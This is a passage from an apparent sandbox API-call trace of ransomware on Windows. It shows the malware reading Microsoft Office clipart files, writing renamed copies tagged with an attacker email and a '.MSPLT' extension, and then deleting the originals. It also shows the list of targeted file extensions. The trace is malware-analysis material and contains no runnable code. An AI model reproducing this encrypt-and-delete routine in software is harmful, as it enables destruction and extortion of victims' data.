dwFileAttributes=0x220) returned 1 [0298.238] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif")) returned 1 [0298.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.239] lstrlenW (lpString=".doc") returned 4 [0298.239] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0298.239] lstrlenW (lpString=".docx") returned 5 [0298.239] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0298.239] lstrlenW (lpString=".pdf") returned 4 [0298.239] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0298.239] lstrlenW (lpString=".xls") returned 4 [0298.239] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0298.239] lstrlenW (lpString=".xlsx") returned 5 [0298.239] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0298.239] lstrlenW (lpString=".ppt") returned 4 [0298.239] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0298.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.239] lstrlenW (lpString=".zip") returned 4 [0298.239] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0298.240] lstrlenW (lpString=".rar") returned 4 [0298.240] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0298.240] lstrlenW (lpString=".bz2") returned 4 [0298.240] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0298.240] lstrlenW (lpString=".7z") returned 3 [0298.240] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0298.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.240] lstrlenW (lpString=".dbf") returned 4 [0298.240] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0298.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.240] lstrlenW (lpString=".1cd") returned 4 [0298.240] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0298.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.240] lstrlenW (lpString=".jpg") returned 4 [0298.240] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0298.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.240] lstrlenW (lpString=".doc") returned 4 [0298.240] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0298.240] lstrlenW (lpString=".docx") returned 5 [0298.240] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0298.240] lstrlenW (lpString=".pdf") returned 4 [0298.240] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0298.240] lstrlenW (lpString=".xls") returned 4 [0298.240] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0298.240] lstrlenW (lpString=".xlsx") returned 5 [0298.241] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0298.241] lstrlenW (lpString=".ppt") returned 4 [0298.241] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0298.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.241] lstrlenW (lpString=".zip") returned 4 [0298.241] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0298.241] lstrlenW (lpString=".rar") returned 4 [0298.241] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0298.241] lstrlenW (lpString=".bz2") returned 4 [0298.241] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0298.241] lstrlenW (lpString=".7z") returned 3 [0298.241] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0298.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.241] lstrlenW (lpString=".dbf") returned 4 [0298.241] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0298.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.241] lstrlenW (lpString=".1cd") returned 4 [0298.241] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0298.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0298.241] lstrlenW (lpString=".jpg") returned 4 [0298.241] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0298.241] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.241] lstrlenW (lpString="BD20013_.WMF") returned 12 [0298.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.244] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=11058) returned 1 [0298.244] CloseHandle (hObject=0x454) returned 1 [0298.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf")) returned 0x220 [0298.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.245] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0298.245] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0298.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0298.246] GetLastError () returned 0x0 [0298.246] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x2b32, lpOverlapped=0x0) returned 1 [0298.251] WriteFile (in: hFile=0x42c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x2b40, lpOverlapped=0x0) returned 1 [0298.252] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0298.253] WriteFile (in: hFile=0x42c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0298.253] SetEndOfFile (hFile=0x42c) returned 1 [0298.259] CloseHandle (hObject=0x42c) returned 1 [0298.265] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0298.265] SetEndOfFile (hFile=0x454) returned 1 [0298.271] CloseHandle (hObject=0x454) returned 1 [0298.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0298.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf")) returned 1 [0298.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.275] lstrlenW (lpString=".doc") returned 4 [0298.275] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.275] lstrlenW (lpString=".docx") returned 5 [0298.275] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.275] lstrlenW (lpString=".pdf") returned 4 [0298.275] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.275] lstrlenW (lpString=".xls") returned 4 [0298.275] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.275] lstrlenW (lpString=".xlsx") returned 5 [0298.275] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.275] lstrlenW (lpString=".ppt") returned 4 [0298.275] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.275] lstrlenW (lpString=".zip") returned 4 [0298.275] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.275] lstrlenW (lpString=".rar") returned 4 [0298.275] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.275] lstrlenW (lpString=".bz2") returned 4 [0298.275] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.275] lstrlenW (lpString=".7z") returned 3 [0298.276] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.276] lstrlenW (lpString=".dbf") returned 4 [0298.276] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.276] lstrlenW (lpString=".1cd") returned 4 [0298.276] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.276] lstrlenW (lpString=".jpg") returned 4 [0298.276] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.276] lstrlenW (lpString=".doc") returned 4 [0298.276] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.276] lstrlenW (lpString=".docx") returned 5 [0298.276] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.276] lstrlenW (lpString=".pdf") returned 4 [0298.276] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.276] lstrlenW (lpString=".xls") returned 4 [0298.276] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.276] lstrlenW (lpString=".xlsx") returned 5 [0298.276] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.276] lstrlenW (lpString=".ppt") returned 4 [0298.276] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.276] lstrlenW (lpString=".zip") returned 4 [0298.277] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.277] lstrlenW (lpString=".rar") returned 4 [0298.277] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.277] lstrlenW (lpString=".bz2") returned 4 [0298.277] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.277] lstrlenW (lpString=".7z") returned 3 [0298.277] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.277] lstrlenW (lpString=".dbf") returned 4 [0298.277] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.277] lstrlenW (lpString=".1cd") returned 4 [0298.277] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0298.277] lstrlenW (lpString=".jpg") returned 4 [0298.277] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.277] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.277] lstrlenW (lpString="BL00008_.WMF") returned 12 [0298.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.278] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=12520) returned 1 [0298.278] CloseHandle (hObject=0x454) returned 1 [0298.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf")) returned 0x220 [0298.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d0 [0298.631] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0298.632] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0298.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d4 [0298.632] GetLastError () returned 0x0 [0298.632] ReadFile (in: hFile=0x4d0, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x30e8, lpOverlapped=0x0) returned 1 [0298.694] WriteFile (in: hFile=0x4d4, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x30f0, lpOverlapped=0x0) returned 1 [0298.696] ReadFile (in: hFile=0x4d0, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0298.696] WriteFile (in: hFile=0x4d4, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0298.696] SetEndOfFile (hFile=0x4d4) returned 1 [0298.697] CloseHandle (hObject=0x4d4) returned 1 [0298.708] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0298.708] SetEndOfFile (hFile=0x4d0) returned 1 [0298.714] CloseHandle (hObject=0x4d0) returned 1 [0298.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.384] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf")) returned 1 [0299.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.385] lstrlenW (lpString=".doc") returned 4 [0299.385] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.385] lstrlenW (lpString=".docx") returned 5 [0299.385] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.385] lstrlenW (lpString=".pdf") returned 4 [0299.385] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.385] lstrlenW (lpString=".xls") returned 4 [0299.385] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.385] lstrlenW (lpString=".xlsx") returned 5 [0299.385] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.385] lstrlenW (lpString=".ppt") returned 4 [0299.385] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.386] lstrlenW (lpString=".zip") returned 4 [0299.386] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.386] lstrlenW (lpString=".rar") returned 4 [0299.386] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.386] lstrlenW (lpString=".bz2") returned 4 [0299.386] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.386] lstrlenW (lpString=".7z") returned 3 [0299.386] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.386] lstrlenW (lpString=".dbf") returned 4 [0299.386] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.386] lstrlenW (lpString=".1cd") returned 4 [0299.386] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.386] lstrlenW (lpString=".jpg") returned 4 [0299.386] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.386] lstrlenW (lpString=".doc") returned 4 [0299.386] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.386] lstrlenW (lpString=".docx") returned 5 [0299.386] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.386] lstrlenW (lpString=".pdf") returned 4 [0299.386] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.386] lstrlenW (lpString=".xls") returned 4 [0299.386] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.386] lstrlenW (lpString=".xlsx") returned 5 [0299.386] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.386] lstrlenW (lpString=".ppt") returned 4 [0299.386] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.387] lstrlenW (lpString=".zip") returned 4 [0299.387] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.387] lstrlenW (lpString=".rar") returned 4 [0299.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.387] lstrlenW (lpString=".bz2") returned 4 [0299.387] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.387] lstrlenW (lpString=".7z") returned 3 [0299.387] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.387] lstrlenW (lpString=".dbf") returned 4 [0299.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.387] lstrlenW (lpString=".1cd") returned 4 [0299.387] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0299.387] lstrlenW (lpString=".jpg") returned 4 [0299.387] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.387] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.387] lstrlenW (lpString="BL00152_.WMF") returned 12 [0299.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.388] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=1516) returned 1 [0299.388] CloseHandle (hObject=0x4c0) returned 1 [0299.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf")) returned 0x220 [0299.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.389] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.389] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0299.389] GetLastError () returned 0x0 [0299.389] ReadFile (in: hFile=0x4c0, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x5ec, lpOverlapped=0x0) returned 1 [0299.410] WriteFile (in: hFile=0x464, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x5f0, lpOverlapped=0x0) returned 1 [0299.412] ReadFile (in: hFile=0x4c0, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0299.412] WriteFile (in: hFile=0x464, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0299.412] SetEndOfFile (hFile=0x464) returned 1 [0299.412] CloseHandle (hObject=0x464) returned 1 [0299.416] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.416] SetEndOfFile (hFile=0x4c0) returned 1 [0299.419] CloseHandle (hObject=0x4c0) returned 1 [0299.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.420] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf")) returned 1 [0299.421] lstrlenW 